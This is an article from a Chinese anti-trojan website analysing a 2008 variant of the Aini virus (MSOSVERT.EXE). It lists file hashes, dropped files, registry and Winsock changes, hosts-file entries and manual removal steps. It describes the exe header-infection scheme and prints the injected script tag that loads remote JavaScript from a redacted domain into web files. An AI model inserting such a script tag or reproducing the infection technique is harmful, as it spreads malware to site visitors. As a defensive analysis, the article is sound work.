载入中…

 | 网站首页 | 文章中心 | 下载中心 | 图片中心 | 反木马论坛 |日志分析|样本上传|求助| | 

您现在的位置: 反木马在线 >> 文章中心 >> 木马查杀 >> 文章正文
艾妮新变种MSOSVERT.EXE的分析
作者:佚名    文章来源:不详    点击数:    更新时间:2008-2-4

昨天接到一个新的艾妮变种 测试了一下 发现下载的木马比原来多了 并且开始感染htm等文件
具体分析

File: MSOSVERT.EXE
Size: 6776 bytes
MD5: 37FCF66D65C6BBA3ACCD58E70F7D7D84
SHA1: 58B5604B92E9620ED11AF38AF7E84FD00ED0B485
CRC32: E2BC55ED

文件变化:
释放文件
C:\WINDOWS\error.ini
C:\WINDOWS\svchost.exe(记事本文件)
C:\Program Files\Common Files\Microsoft Shared\Web Folders\MSOSV.EXE
试图向A盘 写入game.exe 和 autorun.inf

读取error.inf的配置文件并根据里面的内容启动IE下载文件
http://xxxxxx/boot/imageh.gif
http://xxxxxx/boot/table.gif
http://xxxxxx/www/vip.exe

imageh.gif是一个记事本文件 记录的是要屏蔽的网址
vip.exe是 程序自身的更新
遍历非系统分区下的 exe css html aspx htm php jsp asp文件

感染exe文件
感染方式 是文件头感染 不改变图标 在被感染文件的最后8个字节的后4个字节写入感染的日期
前4个字节 写入被感染文件的源文件在已感染文件中的偏移

感染css html aspx htm php jsp asp文件
在文件尾部加入 <script language=javascript src=http://www.xxxxxx.com/1717.js></script>的代码

修改hosts文件

病毒体内有文字 OH,My god! xV4 drink too muck

下载木马到C:\Program Files\Common Files\Microsoft Shared\Web Folders下面
分别命名为 TempA~TempJ.exe

木马植入完毕后 增加如下文件
C:\WINDOWS\system32\dllhost32.exe
C:\WINDOWS\system32\mosou.exe
C:\WINDOWS\system32\msapi.dll
C:\WINDOWS\system32\mssock.sys
C:\WINDOWS\system32\nwizqjsj.exe
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\nwizwlwzs.exe
C:\WINDOWS\system32\nwizwmgjs.exe
C:\WINDOWS\system32\nwizzhuxians.exe
C:\WINDOWS\system32\RAV00AE.DAT
C:\WINDOWS\system32\RAV00AE.exe
C:\WINDOWS\system32\Ravasktao.exe

sreng日志表现如下
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
       <rundll32><C:\Program Files\Common Files\Microsoft Shared\Web Folders\MSOSV.EXE>     []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
       <RAV00AE><C:\WINDOWS\system32\RAV00AE.exe>     []
Winsock 提供者
MSAPI Tcpip [TCP/IP]
       C:\WINDOWS\system32\msapi.dll(, N/A)
MSAPI Tcpip [UDP/IP]
       C:\WINDOWS\system32\msapi.dll(, N/A)
HOSTS 文件

127.0.0.1         mmm.caifu18.net
127.0.0.1         www.18dmm.com
127.0.0.1         d.qbbd.com
127.0.0.1         www.5117music.com
127.0.0.1         www.union123.com
127.0.0.1         www.wu7x.cn
127.0.0.1         www.54699.com
...

解决方法:
安全模式下(开机后不断 按F8键     然后出来一个高级菜单 选择第一项 安全模式 进入系统)

打开sreng
启动项目     注册表 删除如下项目
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
       <rundll32><C:\Program Files\Common Files\Microsoft Shared\Web Folders\MSOSV.EXE>     []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
       <RAV00AE><C:\WINDOWS\system32\RAV00AE.exe>     []
系统修复     winsock供应者 重置所有内容为默认值

系统修复 hosts文件 重置

重启计算机

双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击

“是” 然后确定
删除C:\WINDOWS\system32\dllhost32.exe
C:\WINDOWS\system32\mosou.exe
C:\WINDOWS\system32\msapi.dll
C:\WINDOWS\system32\mssock.sys
C:\WINDOWS\system32\nwizqjsj.exe
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\nwizwlwzs.exe
C:\WINDOWS\system32\nwizwmgjs.exe
C:\WINDOWS\system32\nwizzhuxians.exe
C:\WINDOWS\system32\RAV00AE.DAT
C:\WINDOWS\system32\RAV00AE.exe
C:\WINDOWS\system32\Ravasktao.exe
C:\WINDOWS\error.ini
C:\WINDOWS\svchost.exe
C:\Program Files\Common Files\Microsoft Shared\Web Folders\MSOSV.EXE

使用杀毒软件 修复受感染的exe文件
使用http://www.vaid.cn/blog/read.php?9 所提供的工具 修复受感染的htm等文件
发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
 
  • 上一篇文章:

  • 下一篇文章:
    • 相关新闻
    警惕:艾妮病毒重现网络
    论坛新帖
    新 闻 TOP 10
  • 没有热点文章
    		•
    点击申请点击申请点击申请点击申请点击申请点击申请点击申请
    点击申请点击申请点击申请点击申请点击申请点击申请点击申请点击申请
    文字链接: 热门下说网
    Copyright © 2008 FanMuMa.com All Rights Reserved
    客服邮箱:fanmuma#126.com(将#换为@) 站长:Fisco 联系电话:15802671439 联系QQ:337803 
    捍卫属于个人的一切--